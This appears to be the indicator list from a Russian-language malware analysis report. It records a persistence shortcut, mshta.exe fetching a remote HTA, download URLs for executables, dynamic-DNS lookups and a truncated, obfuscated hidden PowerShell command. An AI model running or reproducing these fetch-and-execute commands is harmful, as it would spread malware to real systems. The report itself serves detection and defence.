Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\svhoster.lnk
- '<SYSTEM32>\mshta.exe' http://bi#.do/fC2he
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL C:\Users\Public\ole
- 'C:\users\public\ole.exe'
- ole.exe
- C:\users\public\ole
- C:\users\public\ole.exe
- http://bi#.do/fC2he
- http://18#.#42.104.197/gkrq/out-pic4.hta
- http://bi#.do/fC2gm
- http://18#.#42.104.197/gkrq/Photo4.jpg
- http://bi#.do/fCZ9Q
- http://18#.#42.104.197/gkrq/eraz.exe
- DNS ASK bi#.do
- DNS ASK wi#####e0901.mywire.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count...' (со скрытым окном; командная строка в отчёте обрезана)